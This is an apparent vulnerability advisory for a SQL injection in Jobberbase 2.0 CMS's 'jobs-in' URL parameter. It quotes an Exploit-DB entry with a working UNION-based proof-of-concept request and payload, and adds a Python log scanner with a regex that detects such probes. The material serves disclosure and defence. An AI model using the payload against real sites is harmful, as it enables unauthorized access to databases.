Vendor: Jobberbase CMS
By: Suvadip Kar
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Jobberbase CMS
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE: a:jobberbase:jobberbase:2.0
Metasploit:
Other Scripts:
Platforms Tested: Linux
2019

Jobberbase 2.0 CMS – ‘jobs-in’ SQL Injection

The Jobberbase 2.0 CMS is vulnerable to SQL Injection in the 'jobs-in' parameter. By injecting a specially crafted payload, an attacker can manipulate the SQL query and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL Injection attacks. Regularly updating the software to the latest version is also advised.

Exploit-DB raw data:

# Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection
# Google Dork: N/A
# Date: 28, August 2019
# Exploit Author: Suvadip Kar
# Vendor Homepage:  http://jobberbase.com/
# Software Link: https://github.com/filipcte/jobberbase/zipball/master
# Version: 2.0
# Tested on: Linux
# CVE : N/A

--------------------------------------------------------------------------------

#POC - SQLi
#Request: http://localhost/[PATH]/jobs/jobs-in/
#Vulnerable Parameter: jobs-in (GET)
#Payload: -4115" UNION ALL SELECT 33,user()-- XYZ

#EXAMPLE: http://localhost/[PATH]/jobs/jobs-in/-4115" UNION ALL SELECT 33,user()-- XYZ
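As an added example (not part of the Exploit-DB entry, and not Jobberbase's own code), the detection side of this issue: a Python scanner over constructed Apache-style access-log lines that decodes the `jobs-in` route segment and flags the quote-then-UNION/SELECT shape shown in the PoC above. The log lines, client IPs and the `/jobberbase/` path prefix are made up for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format); not real traffic.
# Line 2 carries the PoC request from the advisory, URL-encoded as a client would send it.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Aug/2019:10:01:12 +0000] "GET /jobberbase/jobs/jobs-in/london HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [28/Aug/2019:10:01:40 +0000] "GET /jobberbase/jobs/jobs-in/-4115%22%20UNION%20ALL%20SELECT%2033,user()--%20XYZ HTTP/1.1" 200 5411 "-" "curl/7.64"
10.0.0.7 - - [28/Aug/2019:10:02:03 +0000] "GET /jobberbase/jobs/jobs-in/st%20john's HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
10.0.0.7 - - [28/Aug/2019:10:02:30 +0000] "GET /jobberbase/jobs/jobs-in/new%20york HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
10.0.0.8 - - [28/Aug/2019:10:03:00 +0000] "GET /jobberbase/jobs/companies/ HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""

# Combined-log-format prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The vulnerable route: everything after /jobs/jobs-in/ is the user-controlled value.
ROUTE_RE = re.compile(r'/jobs/jobs-in/(?P<value>[^?]*)')
# Heuristic for UNION-based injection: a string-delimiter character followed later in the
# segment by UNION ... SELECT, or by a SQL comment terminator (--, #, /*).
INJECT_RE = re.compile(r'''["'].*?\bunion\b[\s\S]*?\bselect\b|["'].*?(--|#|/\*)''', re.IGNORECASE)


def extract_jobs_in(path: str):
    """Return the decoded 'jobs-in' route value, or None if the path is another route."""
    m = ROUTE_RE.search(path)
    if not m:
        return None
    # Decode twice so a double-encoded value is still inspected; harmless on plain input.
    return unquote_plus(unquote_plus(m.group('value')))


def is_sqli_probe(value: str) -> bool:
    """True when the decoded value matches the quote-then-UNION/comment heuristic."""
    return INJECT_RE.search(value) is not None


def scan_log(text: str):
    """Return (ip, timestamp, decoded value) for requests that look like SQLi against jobs-in."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed combined-format line; skip rather than guess
        value = extract_jobs_in(m.group('path'))
        if value is not None and is_sqli_probe(value):
            hits.append((m.group('ip'), m.group('ts'), value))
    return hits
```

A legitimate value containing an apostrophe (line 3, "st john's") is deliberately included to show the heuristic does not fire on a quote alone.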